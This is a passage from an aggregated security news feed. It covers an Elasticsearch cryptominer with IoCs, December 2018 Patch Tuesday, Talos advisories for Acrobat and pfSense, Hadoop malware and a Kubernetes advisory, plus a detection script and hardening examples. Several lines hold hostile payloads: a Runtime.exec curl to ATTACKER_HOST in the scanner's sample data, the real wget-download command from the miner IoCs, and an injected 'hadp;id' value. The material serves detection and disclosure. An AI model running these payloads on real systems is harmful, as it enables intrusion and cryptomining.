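    '{"a":{"script":"java.lang.Runtime.getRuntime().exec('
    '\\"curl -o /etc/devtools http://ATTACKER_HOST/devtools\\")"}}}',
]


@dataclass
class Finding:
    line_no: int
    src: str
    score: int = 0
    reasons: list = field(default_factory=list)


def _strings(node):
    """Yield (key, value) for every string inside a nested JSON structure."""
    if isinstance(node, dict):
        for k, v in node.items():
            if isinstance(v, str):
                yield k, v
            else:
                yield from _strings(v)
    elif isinstance(node, list):
        for item in node:
            yield from _strings(item)


def analyze_request(body, line_no=0, src=""):
    """Score one request body. Malformed JSON (common in captured payloads)
    falls back to scanning the raw text so nothing is silently skipped."""
    f = Finding(line_no, src)
    try:
        pairs = list(_strings(json.loads(body)))
        script_seen = any(k in SCRIPT_KEYS for k, _ in pairs)
        text = "\n".join(v for _, v in pairs)
    except ValueError:
        script_seen = re.search(r'"script"\s*:', body) is not None
        text = body
    if script_seen:  # dynamic scripting should be disabled on these versions
        f.score += 1
        f.reasons.append("script field present")
    exec_hits = [p.pattern for p in EXEC_PATTERNS if p.search(text)]
    if exec_hits:
        f.score += 3
        f.reasons.append("runtime exec: " + ", ".join(exec_hits))
    m = DOWNLOAD_CMDS.search(text)
    if m:
        f.score += 2
        f.reasons.append("download command: " + m.group(1))
    m = DROP_PATHS.search(text)
    if m:
        f.score += 1
        f.reasons.append("drop path: " + m.group(0))
    return f


def scan_log(lines, threshold=4):
    """Return findings at or above threshold; a lone 'wget' in a search term
    scores 2 and is not reported, the full injection chain scores 7."""
    findings = []
    for n, line in enumerate(lines, 1):
        parts = line.split(" ", 4)
        if len(parts) < 5:
            continue
        f = analyze_request(parts[4], n, parts[1])
        if f.score >= threshold:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} from {f.src}: score {f.score}; " + "; ".join(f.reasons))
```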

Users can consider adopting security solutions that can defend against cryptocurrency-mining malware through a cross-generational blend of threat defense techniques. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Indicators of Compromise (IoCs)

Related hashes (SHA-256)
191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c devtools Coinminer.Linux.MALXMR.UWEIS
d3e1231d1429dccb47caf0c1c46d2eb24afe33887b31a818b8f07f0406db2637 update.sh Coinminer.SH.MALXMR.ATNL

69.30.211.82 – attacker
69.30.203.170

Command used in Elasticsearch:

{"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\").getText()"}}}

Spoofed Elasticsearch version number: 1.4.1

The post Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch appeared first on TrendLabs Security Intelligence Blog.

TrendLabs Security Intelligence Blog: December Patch Tuesday: Year-End Batch Addresses Win32k Elevation of Privilege and Windows DNS Server Vulnerabilities

The just-released Patch Tuesday for December includes a fix for the actively exploited Win32k Elevation of Privilege Vulnerability (CVE-2018-8611). The flaw allows an attacker to exploit a bug in the Windows kernel and run arbitrary code to install programs; view, change, or delete data; or create new accounts with full user rights. It has also been flagged as likely being used together with other bugs in targeted attacks.

The patch release fixes another vulnerability that’s currently under active attack: CVE-2018-8626, a Windows DNS Server Heap Overflow remote code execution (RCE) vulnerability that exists when DNS servers fail to properly handle requests. An attacker who successfully exploits the vulnerability could run arbitrary code in the context of the Local System Account. Taking advantage of the vulnerability can be done by sending a specially crafted request to an affected DNS server.

Other noteworthy patches in the batch include a Critical-rated remote code injection vulnerability in the .NET Framework and a text-to-speech RCE bug.

Microsoft closes out the year with 39 security patches and one advisory that cover issues in Internet Explorer (IE), Edge, ChakraCore, Microsoft Windows, Office and Microsoft Office Services and Web Apps, and the .NET Framework. Of the 39 CVEs, nine are listed as Critical and 30 as Important in severity. Five were disclosed through the Zero Day Initiative (ZDI) program.

On the Adobe front, a total of 87 CVEs were covered by their release, with 39 of these handled by the ZDI. All of the bugs are listed as Important, save for one Moderate CVE. As early as December 5, Adobe also shipped an early patch for Flash Player that addresses two CVEs, with one designated as CVE-2018-15982 and listed as under active attack. The use-after-free (UAF) exploit allows an attacker to execute code at the level of the logged-on user. The embedded Flash SWF in a Microsoft Office document is being spread through spear-phishing campaigns.

Trend Micro™ Deep Security and Vulnerability Protection protect user systems from any threats that may target the vulnerabilities addressed in this month’s round of updates via the following DPI rules:

  • 1009409-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8583)
  • 1009410-Microsoft Internet Explorer Remote Code Execution Vulnerability (CVE-2018-8619)
  • 1009411-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8617)
  • 1009412-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8618)
  • 1009413-Microsoft Text-To-Speech Remote Code Execution Vulnerability (CVE-2018-8634)
  • 1009414-Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2018-8631)
  • 1009415-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8629)
  • 1009416-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8624)
  • 1009427-Microsoft PowerPoint Remote Code Execution Vulnerability (CVE-2018-8628)
  • 1009428-Microsoft Outlook Remote Code Execution Vulnerability (CVE-2018-8587)
  • 1009429-Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2018-8643)
  • 1009430-Microsoft Internet Explorer Remote Code Execution Vulnerability (CVE-2018-8625)
  • 1009431-Microsoft Windows Multiple Security Vulnerabilities (Dec-2018)

Trend Micro™ TippingPoint™ customers are protected from threats that may exploit this month’s list of vulnerabilities via these MainlineDV filters:

  • 33685: HTTP: Microsoft Edge Chakra JIT Type Confusion Vulnerability
  • 33686: HTTP: Microsoft Edge Chakra InlineArrayPush Type Confusion Vulnerability
  • 33687: HTTP: Microsoft Edge Chakra defineSetter Type Confusion Vulnerability
  • 33688: HTTP: Microsoft Edge Memory Corruption Vulnerability
  • 33689: HTTP: Microsoft Edge ArrayBuffer Out-of-Bounds Write Vulnerability
  • 33690: HTTP: Microsoft Internet Explorer Array Prototype Out-of-Bounds Write Vulnerability
  • 33691: HTTP: Microsoft Edge SpeechSynthesis Buffer Overflow Vulnerability
  • 33708: HTTP: Microsoft XML XSL VBScript Usage
  • 33711: HTTP: Adobe Flash Player SWF Parsing Use-After-Free Vulnerability
  • 33818: HTTP: Microsoft PowerPoint Use-After-Free Vulnerability
  • 33819: HTTP: Microsoft Internet Explorer Use-After-Free Vulnerability
  • 33820: HTTP: Microsoft Windows Kernel Use-After-Free Vulnerability
  • 33822: HTTP: Microsoft Windows win32kfull.sys Integer Overflow Vulnerability

The post December Patch Tuesday: Year-End Batch Addresses Win32k Elevation of Privilege and Windows DNS Server Vulnerabilities appeared first on TrendLabs Security Intelligence Blog.

Vulnerability Spotlight: Adobe Acrobat Reader DC text field remote code execution vulnerability


Aleksandar Nikolic of Cisco Talos discovered this vulnerability.

Executive summary

Adobe Acrobat Reader DC contains a vulnerability that could allow an attacker to remotely execute code on the victim’s machine. If the attacker tricks the user into opening a specially crafted PDF with specific JavaScript, they could cause heap corruption. The user could also trigger this bug if they open a specially crafted email attachment.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC text field value remote code execution vulnerability (TALOS-2018-0704/CVE-2018-19716)

Adobe Acrobat Reader supports embedded JavaScript in PDFs to allow for more user interaction. However, this gives the attacker the ability to precisely control memory layout, and it poses an additional attack surface. If the attacker tricks the user into opening a PDF with two specific lines of JavaScript code, it will trigger an incorrect integer size promotion, leading to heap corruption. It’s possible to corrupt the heap to the point that the attacker could arbitrarily execute code on the victim’s machine.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Adobe Acrobat Reader DC 2019.8.20071 is impacted by this vulnerability.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48293, 48294

Microsoft Patch Tuesday — December 2018: Vulnerability disclosures and Snort coverage


Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 38 vulnerabilities, nine of which are rated “critical” and 29 that are considered “important.” There are no “moderate” or “low” vulnerabilities in this release.

The advisories cover bugs in the Chakra scripting engine, several Microsoft Office products and the Microsoft Internet Explorer web browser.

For coverage of these vulnerabilities, check out our Snort blog post on this week's rule update.

Critical vulnerabilities


Microsoft disclosed nine critical vulnerabilities this month, which we will highlight below.

CVE-2018-8583, CVE-2018-8617, CVE-2018-8618, CVE-2018-8624 and CVE-2018-8629 are all memory corruption vulnerabilities in the Chakra scripting engine that could allow an attacker to execute code on the victim machine remotely. All of the bugs lie in the way the scripting engine handles objects in memory in the Microsoft Edge web browser. An attacker could exploit these vulnerabilities by tricking a user into visiting a web page using Microsoft Edge, or by tricking them into clicking on specially crafted content on other sites that accept user-created content.

CVE-2018-8540 is a remote code injection vulnerability in the Microsoft .NET framework. An attacker can exploit this flaw by passing a specific input to an application utilizing vulnerable .NET methods. If successful, the attacker could take control of an affected system.

CVE-2018-8626 is a remote code execution vulnerability that exists in Windows DNS servers when they fail to properly handle requests. An attacker could run arbitrary code on an affected system if they exploit the vulnerability by sending malicious requests to a Windows DNS server. Windows servers that are configured as DNS servers are susceptible to this vulnerability.

CVE-2018-8631 is a remote code execution vulnerability in Internet Explorer. The bug lies in the way the web browser accesses objects in memory. An attacker could exploit this bug by tricking a user into visiting a specially crafted, malicious web page in Internet Explorer. If successful, the attacker could execute arbitrary code in the context of the current user.

CVE-2018-8634 is a memory corruption vulnerability in the Microsoft Edge that exists when the web browser improperly handles objects in memory. An attacker who successfully exploits this flaw by tricking a user into visiting a malicious, specially crafted web page could gain the ability to execute arbitrary code on the machine in the context of the current user.

Important vulnerabilities

This release also contains 29 important vulnerabilities, eight of which we will highlight below.

CVE-2018-8597 and CVE-2018-8636 are remote code execution vulnerabilities in Microsoft Excel that exist when the software fails to properly handle objects in memory. An attacker can exploit these bugs by tricking the user into opening a specially crafted Excel file, either via the web or as an email attachment. If successful, the attacker could gain the ability to execute arbitrary code on the system in the context of the current user.

CVE-2018-8587 is a remote code execution vulnerability in Microsoft Outlook that exists when the software fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted email attachment while using the Outlook client. If successful, the attacker could use a specially crafted file to perform actions in the security context of the current user. For example, the file could act on behalf of the logged-on user with the same permissions as the current user.

CVE-2018-8590 is a remote code execution vulnerability in Microsoft Word that exists when the software fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a malicious, specially crafted Word document, either via email, the web, or another vector.

CVE-2018-8619 is a remote code execution vulnerability that exists when the Internet Explorer VBScript execution policy improperly restricts VBScript in certain scenarios. An attacker could use this vulnerability to run arbitrary code with the permissions of the current user. A user could trigger this vulnerability if they visited a specially crafted web page using Internet Explorer.

CVE-2018-8625 is a remote code execution vulnerability in the VBScript engine. The vulnerability could corrupt memory in such a way that an attacker could execute code in the context of the current user. An attacker could trigger this flaw by tricking the user into visiting a specially crafted website on Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

CVE-2018-8628 is a remote code execution vulnerability in Microsoft PowerPoint that lies in the way the software processes objects in memory. An attacker could exploit this bug by tricking the user into opening a specially crafted, malicious PowerPoint file, which would eventually grant them the ability to execute code remotely in the context of the current user. The Preview Pane is not an attack vector for this vulnerability — the user must open the file in PowerPoint.

CVE-2018-8643 is a remote code execution vulnerability that exists in the way the scripting engine handles objects in memory in Internet Explorer. An attacker could exploit this bug by tricking a user into visiting a specially crafted web page on Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine. If successful, the attacker could then corrupt memory in such a way that they could execute arbitrary code in the context of the current user.

The other important vulnerabilities in this release are:

Coverage 

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 45142, 45143, 48509, 48510, 48513 - 48520, 48531 - 48534, 48559, 48562

Latest Malware Strains Target Cloudera Hadoop for Bitcoin Mining and DDoS Attacks

Security researchers discovered that several new malware strains are targeting known Cloudera Hadoop vulnerabilities.

The malware variants, including XBash and DemonBot, target Hadoop clusters that are connected to the internet and do not use Kerberos authentication, according to Cloudera. This can lead to certain exploits such as bitcoin mining and distributed denial-of-service (DDoS) attacks, which can create significant negative performance impacts within client environments.

These vulnerability attacks can occur when your Cloudera Hadoop system is not properly configured and secured. For example, when Kerberos is not enabled clusterwide, your Hadoop clusters become yet another possible attack vector.

The good news is that the attack techniques in question are not sophisticated and utilize known exploits, meaning organizations can protect themselves by taking the right precautions.

Protect Yourself With Strong Kerberos Authentication

Countering such attacks requires the use of strong Kerberos authentication to identify the right access for privileged users. Without proper Kerberos authentication, any user can connect to Hadoop clusters, access the system and make bad choices.

To follow best practices, implement additional authentication steps to secure your Cloudera Hadoop clusters, including the following:

  • Secure default accounts and passwords.
  • Utilize Lightweight Directory Access Protocol (LDAP) authentication for Cloudera Manager.
  • Enable Sentry service using Kerberos.
  • Use a secure protocol such as Secure Sockets Layer (SSL) or Transport Layer Security (TLS).
  • Secure default ports.

How do you know whether or not your environment is at risk to begin with? That’s where vulnerability scans come into play.

How to Identify if Your Cloudera Hadoop Clusters Are Affected

Vulnerability assessment solutions for Cloudera Hadoop can provide critical insight into your environment to help mitigate potential attacks. Advanced tools offer security checks and hardening rules to help customers secure their Hadoop clusters, provide rules to help identify Hadoop-specific vulnerabilities, and list detailed recommendations to fix and resolve the vulnerabilities.

To use vulnerability assessment tests to check whether a Cloudera authentication parameter is appropriately set to Kerberos — which is strongly recommended by Cloudera — an organization should take the following steps:

  1. Leverage a vulnerability assessment solution to run the following test: “Authentication method set to Kerberos.”
  2. If a cluster is properly configured, it will pass the test. Multiple systems can be connected to check for this test and get visibility into configuration statuses in minutes.
  3. After running the tests, organizations should attend to the clusters that did not pass. Note that such vulnerabilities can only be addressed with proper configuration, not by simply applying the latest security patches.
  4. Once the configurations have been updated and all nodes authenticate using Kerberos, the problem will be resolved.

As these recent attacks illustrate, vulnerability assessment is a critical piece of any comprehensive data protection program. Last year alone, more than 2 billion records were exposed due to misconfigurations — a number that could have been drastically reduced if teams had been leveraging vulnerability scanning tools.

Source: Cloudera

The post Latest Malware Strains Target Cloudera Hadoop for Bitcoin Mining and DDoS Attacks appeared first on Security Intelligence.

Zero-Day Flash Player Vulnerability Fixed After Being Exploited In the Wild

Adobe has once again patched a serious flaw in the Flash Player that has been exploited in the wild. This

Zero-Day Flash Player Vulnerability Fixed After Being Exploited In the Wild on Latest Hacking News.

Yoast SEO 9.1 Vulnerability Could Allow Command Execution

A few days ago, a researcher discovered a serious security flaw in Yoast plugin. This Yoast SEO 9.1 Vulnerability could

Yoast SEO 9.1 Vulnerability Could Allow Command Execution on Latest Hacking News.

massExploitConsole – An Open Source Tool For Exploiting Known Vulnerabilities

MassExploitConsole is a python based easy-to-use cli tool for executing exploits. It has a collection of exploits to execute, built-in

massExploitConsole – An Open Source Tool For Exploiting Known Vulnerabilities on Latest Hacking News.

Brutex – Open Source Tool for Brute Force Automation

Brutex is a shell based open source tool to make your work faster. It combines the power of Nmap, Hydra

Brutex – Open Source Tool for Brute Force Automation on Latest Hacking News.

Days After Massive Breach, Marriott Customers Await Details

Nearly a week after Marriott disclosed a massive breach of its Starwood reservation system, customers complain that the company has not communicated with them to tell them whether they are affected. Marriott says it is sending “rolling” emails to hundreds of millions of victims. An estimated 500 million Marriott International customers...


Taking Action to Secure Our IBM Cloud Kubernetes Service Against Recent Kubernetes Security Vulnerabilities

This post originally appeared on the IBM Cloud blog and is being shared with permission.

What’s happening?

We’re taking action to secure our IBM Cloud Kubernetes Service against the recent Kubernetes security vulnerabilities.

IBM Cloud Kubernetes Service is affected by the following vulnerabilities that, in some cases, allow unauthorized access to Kubernetes and/or trusted user privilege escalation.

Vulnerability Details

Affected Products and Versions

  • Affected components: Kubernetes API server
  • Affected versions:
    • Kubernetes versions 1.0.x through 1.9.x
    • 1.12.0-1.12.2 (fixed in v1.12.3)
    • 1.11.0-1.11.4 (fixed in v1.11.5)
    • 1.10.0-1.10.10 (fixed in v1.10.11)
    • 1.9.x and 1.8.x (update to v1.10.11)
    • 1.7 (update to 1.9.x and then update to 1.10.11)
    • 1.5 (unsupported, no migration path)

What do I need to know?

This exposure affects your IBM Cloud Kubernetes cluster master only; there is no exposure to your IBM Cloud Kubernetes workers.

There are two exploits as part of this vulnerability:

Vulnerability 1: Authenticated and unauthenticated requests can provide full admin access to Kubernetes API Server.

  • Affected users: This only affects users with aggregated API servers.
    • 1.11 and earlier: IBM Cloud Kubernetes Service does not deploy any aggregated API servers in versions 1.11 and earlier. You will not be impacted unless you have deployed your own aggregated API server.
    • 1.12: All users are affected since all clusters contain the metrics-server, which is an aggregated API server affected by this vulnerability.

Vulnerability 2: Authenticated users with specific permissions to exec/attach/portforward API calls can be escalated to perform any API request against the kubelet API on the node specified in the pod spec.

  • Affected users: All IBM Cloud Kubernetes Service clusters are affected by this vulnerability.

We are releasing updates for all supported releases of IBM Cloud Kubernetes Service this week. Then, all supported clusters will auto-update to remediate the vulnerabilities during the next few days.

How do I mitigate the issue?

If you are on a supported release, then you don’t need to do anything; your IBM Cloud Kubernetes cluster master will be updated automatically.

All supported IBM Cloud Kubernetes Service clusters at version 1.10 and later will be updated automatically to address this security flaw. If you find that your cluster has not been automatically updated over the next few days, please contact IBM Support.

Customers running unsupported IBM Cloud Kubernetes versions must upgrade the affected clusters to a supported version (1.10.11, 1.11.5, 1.12.3, or later) when these versions are released by IBM.

Refer to https://cloud.ibm.com/docs/containers/cs_versions.html for more information about Kubernetes versions.

You do not need to update your workers for this exposure, but we do recommend that you always stay current with your workers to ensure you are not vulnerable to other exposures.

How do I check my version?

To see which Kubernetes versions the IBM Cloud Kubernetes Service has released:
ibmcloud ks kube-versions

To see which version your clusters are currently using:
ibmcloud ks clusters

What about unsupported clusters?

For 1.9.x or 1.8.x, you must update your cluster to a supported release:
ibmcloud ks cluster-update --cluster <clustername> --kube-version 1.10

For 1.7.x, you must first update to 1.9 and then update to a supported release:

  1. Run: ibmcloud ks cluster-update --cluster <clustername> --kube-version 1.9
  2. Confirm that the update completed successfully by checking the Kubernetes version.
  3. Run: ibmcloud ks cluster-update --cluster <clustername> --kube-version 1.10
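To apply the version table and update steps above across many clusters at once, here is an added example (not IBM's tooling) that parses the output of ibmcloud ks clusters and picks the remediation path for each cluster. The table layout it reads (whitespace-separated columns, version last, build suffix after an underscore, a trailing asterisk when an update is available) is an assumption, and the sample clusters are constructed.

```python
"""Classify clusters by the remediation path in the advisory, from the output
of `ibmcloud ks clusters`. Added example, not IBM's tooling; the table layout
is assumed and the sample below is constructed."""
import re

# First fixed patch level for each affected minor release, per the advisory.
FIRST_FIXED = {10: 11, 11: 5, 12: 3}

# Constructed sample in the assumed layout of `ibmcloud ks clusters`.
SAMPLE_CLUSTERS = """\
Name        ID          State    Created        Workers   Location   Version
prod-east   a1b2c3d4    normal   1 year ago     3         dal10      1.12.2_1537*
prod-west   e5f6a7b8    normal   1 year ago     3         dal12      1.11.5_1540
legacy-01   c9d0e1f2    normal   2 years ago    2         dal10      1.9.7_1516
legacy-02   a3b4c5d6    normal   2 years ago    2         dal13      1.7.4_1502
archive     e7f8a9b0    normal   3 years ago    1         dal10      1.5.6_1408
"""


def parse_version(text):
    """'1.10.11_1536' or '1.9' -> (1, 10, 11) / (1, 9, 0); ignores build suffixes."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Kubernetes version: {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def update_cmd(cluster, target):
    """The cluster-update command from the advisory, filled in for one cluster."""
    return f"ibmcloud ks cluster-update --cluster {cluster} --kube-version {target}"


def classify(cluster, version):
    """Return (status, steps). Statuses: 'fixed', 'auto-update' (supported
    release, master is patched automatically), 'update-to-1.10',
    'update-via-1.9', 'unsupported' (1.5 and older: no migration path)."""
    major, minor, patch = parse_version(version)
    if major != 1:
        raise ValueError(f"unexpected major version in {version!r}")
    if minor in FIRST_FIXED:
        if patch >= FIRST_FIXED[minor]:
            return "fixed", []
        return "auto-update", ["no action; contact IBM Support if the master "
                               "is not updated within a few days"]
    if minor > 12:
        return "fixed", []  # advisory: "1.12.3, or later"
    if minor in (8, 9):
        return "update-to-1.10", [update_cmd(cluster, "1.10")]
    if minor == 7:
        return "update-via-1.9", [update_cmd(cluster, "1.9"),
                                  "confirm the update completed (ibmcloud ks clusters)",
                                  update_cmd(cluster, "1.10")]
    return "unsupported", ["no migration path given in the advisory"]


def triage(table_text):
    """Map cluster name -> (status, steps) from the clusters table."""
    result = {}
    for line in table_text.splitlines()[1:]:  # skip the header row
        cols = line.split()
        if len(cols) < 2:
            continue
        name, version = cols[0], cols[-1].rstrip("*")
        result[name] = classify(name, version)
    return result


if __name__ == "__main__":
    for name, (status, steps) in triage(SAMPLE_CLUSTERS).items():
        print(f"{name}: {status}")
        for step in steps:
            print(f"    {step}")
```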

Questions or comments

Please join us on our public Slack channel at https://ibm-container-service.slack.com or raise a support ticket if you have any issues.

The post Taking Action to Secure Our IBM Cloud Kubernetes Service Against Recent Kubernetes Security Vulnerabilities appeared first on Security Intelligence.

Researchers: GDPR Already Having Positive Effect on Cybersecurity in EU

The General Data Privacy Regulation (GDPR) seems to already be having a positive effect on the state of cybersecurity in Europe less than seven months after it was enacted, showing that policy indeed can have a direct effect on organizations' security practices, security researchers said.

The post Researchers: GDPR Already Having Positive Effect...


Russian Hospital Targeted With Flash Zero-Day After Kerch Incident

Security updates released by Adobe on Wednesday for Flash Player patch two vulnerabilities, including a critical flaw exploited by a sophisticated threat actor in attacks aimed at a healthcare organization associated with the Russian presidential administration. The attack may be related to the recent Kerch Strait incident involving Russia and Ukraine.

Kalitorify – Open Source Tool to Run Kali Linux Traffic Through Tor

Kalitorify is a shell-based script for Kali Linux. It uses iptables and Tor to create a transparent proxy. In

Kalitorify – Open Source Tool to Run Kali Linux Traffic Through Tor on Latest Hacking News.

SecurityWeek RSS Feed: M2M Protocols Expose Industrial Systems to Attacks

Some machine-to-machine (M2M) protocols can be abused by malicious actors in attacks aimed at Internet of Things (IoT) and industrial Internet of Things (IIoT) systems, according to research conducted by Trend Micro and the Polytechnic University of Milan.


IBM Db2 Vulnerabilities Left IBM Database Installations At Risk Of Hacks

IBM patched a couple of serious vulnerabilities in the previous week in their Db2 database installations. These IBM Db2 vulnerabilities

IBM Db2 Vulnerabilities Left IBM Database Installations At Risk Of Hacks on Latest Hacking News.

Vulnerability Spotlight: Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability


Brandon Stultz of Cisco Talos discovered these vulnerabilities.

Executive summary

Today, Cisco Talos is disclosing three command injection vulnerabilities in the system_advanced_misc.php page of Netgate pfSense, one in each of the page's powerd mode parameters. pfSense is a free and open-source firewall and router that also features unified threat management, load balancing, multi-WAN, and more.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Netgate to ensure that these issues are resolved and that an update is available for affected customers.


Vulnerability details

Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4019)

This command injection vulnerability in Netgate pfSense exists because the 'powerd_normal_mode' parameter in POST requests to '/system_advanced_misc.php' is not sanitized before it is used.

For more information on this vulnerability, read the full advisory here.


Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4020)

A command injection vulnerability in Netgate pfSense exists because the 'powerd_ac_mode' parameter in POST requests to '/system_advanced_misc.php' is not sanitized before it is used.

For more information on this vulnerability, read the full advisory here.

Netgate pfSense system_advanced_misc.php powerd_battery_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4021)

A command injection vulnerability in Netgate pfSense exists because the 'powerd_battery_mode' parameter in POST requests to '/system_advanced_misc.php' is not sanitized before it is used.

For more information on this vulnerability, read the full advisory here.
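The three flaws above share one root cause: a POST value that should be one of a handful of fixed mode names reaches a command line unchecked. The block below is an added illustration in Python, not pfSense's PHP code: it models the unsafe string-building pattern next to the hardened form (allowlist the value, then hand an argv list to the process API so no shell ever re-parses it). The mode names, the powerd flags and the hostile input are assumptions made for the example.

```python
"""Added example (not pfSense's code): the command-injection pattern behind
TALOS-2018-0690, modelled in Python, beside its hardened form."""
import shlex

# Assumed allowlist of powerd modes for this example; pfSense keeps its own
# list in system_advanced_misc.php and it is not reproduced here.
ALLOWED_MODES = ("hadp", "adp", "min", "max")

# Assumed command shape: the three POST values end up as powerd arguments.
POWERD = "/usr/sbin/powerd"


def build_powerd_cmd_unsafe(normal_mode, ac_mode, battery_mode):
    """Vulnerable pattern: untrusted request values interpolated into one
    shell string. Anything the shell treats specially (';', '|', '&&')
    inside a value becomes part of the command line."""
    return "%s -b %s -a %s -n %s" % (POWERD, battery_mode, ac_mode, normal_mode)


def shell_commands(cmd):
    """Tokenise a command string the way a POSIX shell would and split it on
    command separators. Used only to show what the unsafe string would do;
    nothing is executed."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "&&", "||", "|", "&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def is_valid_mode(value):
    """Allowlist check: the only acceptable inputs are the fixed mode names.
    Stripping metacharacters is not enough; reject anything not on the list."""
    return value in ALLOWED_MODES


def validate_mode(value):
    if not is_valid_mode(value):
        raise ValueError("rejected powerd mode: %r" % (value,))
    return value


def build_powerd_argv(normal_mode, ac_mode, battery_mode):
    """Hardened form: validate each value, then build an argv list. Pass it to
    subprocess.run(argv) (shell=False, the default) so no shell parses it."""
    return [POWERD,
            "-b", validate_mode(battery_mode),
            "-a", validate_mode(ac_mode),
            "-n", validate_mode(normal_mode)]


if __name__ == "__main__":
    hostile = "hadp;id"   # constructed hostile POST value
    print(shell_commands(build_powerd_cmd_unsafe(hostile, "hadp", "hadp")))
    try:
        build_powerd_argv(hostile, "hadp", "hadp")
    except ValueError as err:
        print("hardened builder:", err)
```

Run stand-alone, the script shows the unsafe string splitting into two shell commands (the intended powerd invocation and the injected `id`) while the hardened builder refuses the same input. The argv-list form matters as much as the allowlist: even with a clean value, `shell=True` would reintroduce the parsing step the attacker relies on.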

Conclusion

Cisco Talos tested and confirmed that Netgate pfSense CE 2.4.4-RELEASE is affected by these vulnerabilities.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48178

Sennheiser Headphones Vulnerability Could Allow HTTPS Site Spoofing

Sennheiser has recently patched a serious vulnerability in its headphone software. As discovered by the researchers, the vulnerability could allow

Sennheiser Headphones Vulnerability Could Allow HTTPS Site Spoofing on Latest Hacking News.

Webex Meetings Desktop App Vulnerability Existed Even After Patch

Last month, Cisco patched a command injection vulnerability in its Webex Meeting App. The vulnerability could allow arbitrary command execution

Webex Meetings Desktop App Vulnerability Existed Even After Patch on Latest Hacking News.

Hackers Could Exploit A Zoom App Vulnerability To Disrupt Conferences

The customers of Zoom conferencing app need to update their apps at the earliest to protect themselves from hackers. As

Hackers Could Exploit A Zoom App Vulnerability To Disrupt Conferences on Latest Hacking News.

Another Zero-Day Vulnerability Hits NUUO Surveillance Cameras

A couple of months ago, a zero-day vulnerability, named Peekaboo, threatened NUUO surveillance cameras. The vulnerability could allow an attacker

Another Zero-Day Vulnerability Hits NUUO Surveillance Cameras on Latest Hacking News.

Manipulating Digital Mammograms Via Artificial Intelligence May Cause Misdiagnosis

Mammography has been a critical procedure for diagnosing breast cancer. Yet, at the same time, the exposure to radiations has

Manipulating Digital Mammograms Via Artificial Intelligence May Cause Misdiagnosis on Latest Hacking News.

EternalSilence – New Variant Of UPnProxy Exploit Discovered Affecting 45,000 Routers

Earlier this year, Akamai researchers discovered a UPnProxy attack targeting thousands of routers. Now, after so many months, they have found

EternalSilence – New Variant Of UPnProxy Exploit Discovered Affecting 45,000 Routers on Latest Hacking News.

Knock – Open Source Subdomain Scanner Tool

Knock is a python based tool for enumerating subdomains on a targeted domain. You can use a custom wordlist and

Knock – Open Source Subdomain Scanner Tool on Latest Hacking News.

Empire – Open Source Post-Exploitation Agent Tool

Empire is regarded as one of the most useful frameworks by many penetration testers. It has many different powershell and

Empire – Open Source Post-Exploitation Agent Tool on Latest Hacking News.

Blazy – Open Source Modern Login Brute-forcer

I know what you are thinking, bruteforce doesn’t work anymore in many cases. However, Blazy is not just another brute-force

Blazy – Open Source Modern Login Brute-forcer on Latest Hacking News.

Veil-Framework – Open Source Tool to Bypass Common Anti-Virus Solutions

